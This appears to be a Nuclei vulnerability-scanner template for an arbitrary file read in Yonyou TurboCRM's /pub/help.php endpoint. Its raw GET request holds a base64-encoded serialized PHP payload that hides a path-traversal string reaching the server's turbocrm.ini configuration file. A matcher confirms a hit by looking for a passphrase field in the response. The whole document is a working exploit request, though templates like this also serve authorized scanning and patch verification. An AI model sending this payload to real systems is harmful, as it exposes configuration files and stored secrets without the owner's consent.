http:
    - matchers:
        - dsl:
            - status_code==200 && contains(body,"IOSPushPassphrase")
          type: dsl
      raw:
        - |
          GET /pub/help.php?key=YToxOntpOjA7czozMDoiLy4uLy4uLy4uLy4uL3RzdnIvdHVyYm9jcm0uaW5pIjt9 HTTP/1.1
          Host: {{Hostname}}
id: yonyou-turbo-crm-help2-fileread
info:
    author: SleepingBag945
    name: 用友 TurboCRM /pub/help.php 接口任意文件读取
    severity: high
    tags: []
